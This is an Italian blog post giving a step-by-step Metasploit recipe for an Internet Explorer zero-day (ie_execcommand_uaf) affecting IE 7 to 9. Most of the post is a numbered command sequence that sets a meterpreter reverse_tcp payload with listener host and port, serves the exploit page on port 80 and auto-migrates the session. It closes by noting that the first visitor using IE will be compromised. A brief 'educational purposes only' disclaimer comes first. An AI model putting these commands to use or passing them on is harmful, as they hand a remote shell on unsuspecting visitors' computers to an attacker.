Sei in
Home > Microsoft & altri mondi > 0day exploit su Internet Explorer: vediamo come usarlo con Metasploit

0day exploit su Internet Explorer: vediamo come usarlo con Metasploit

Attenzione. Questa guida è puramente a scopo didattico informativo. Né l’ autore né lo staff di OpenGeek Blog si assumono la responsabilità dell’ uso improprio di questa guida. Tramite questa guida potrete capire meglio il funzionamento di Metasploit Framework e capire finalmente che IE è veramente un browser patetico (NdR). Per tanto non verrà assicurato supporto tecnico.

Cosa è:

“E’ noto un zero-day exploit in Internet Explorer utilizzato per portare a segno alcuni attacchi. La falla di sicurezza presente nel browser web mette a rischio il sistema dell’utente nel caso in cui venga visitata un’apposita pagina contenente codice malevolo. L’exploit riguarda Internet Explorer 9 e versioni precedenti su sistemi operativi Windows XP, Vista e Windows 7.”

Info utili:

  • Questo Exploit è molto recente
  • E’ stato testato su versioni di IE quali 7, 8 e 9
  • E’ consigliato per utenti esperti

 Cosa occorre:

  • Metasploit Framework

Procedimento:

  1. Aprite Metasploit sulla msfconsole
  2. Scrivete i seguenti comandi seguiti da ENTER
  3.  use exploit/windows/browser/ie_execcommand_uaf
  4. set PAYLOAD windows/meterpreter/reverse_tcp
  5. set LHOST 0.0.0.0 [vostro IP]
  6. set LPORT 443
  7. set SRVHOST 0.0.0.0
  8. set SRVPORT 80
  9. set URIPATH /
  10. set AutoRunScript migrate -f [use for meterpreter to move from browser process which can be closed]
    i. exploit
  11. Fine

Ora teoricamente la prima persona che si connetterà al vostro IP tramite IE cadrà nell’ exploit.

0day exploit su Internet Explorer: vediamo come usarlo con Metasploit, 5.0 out of 5 based on 1 rating
Top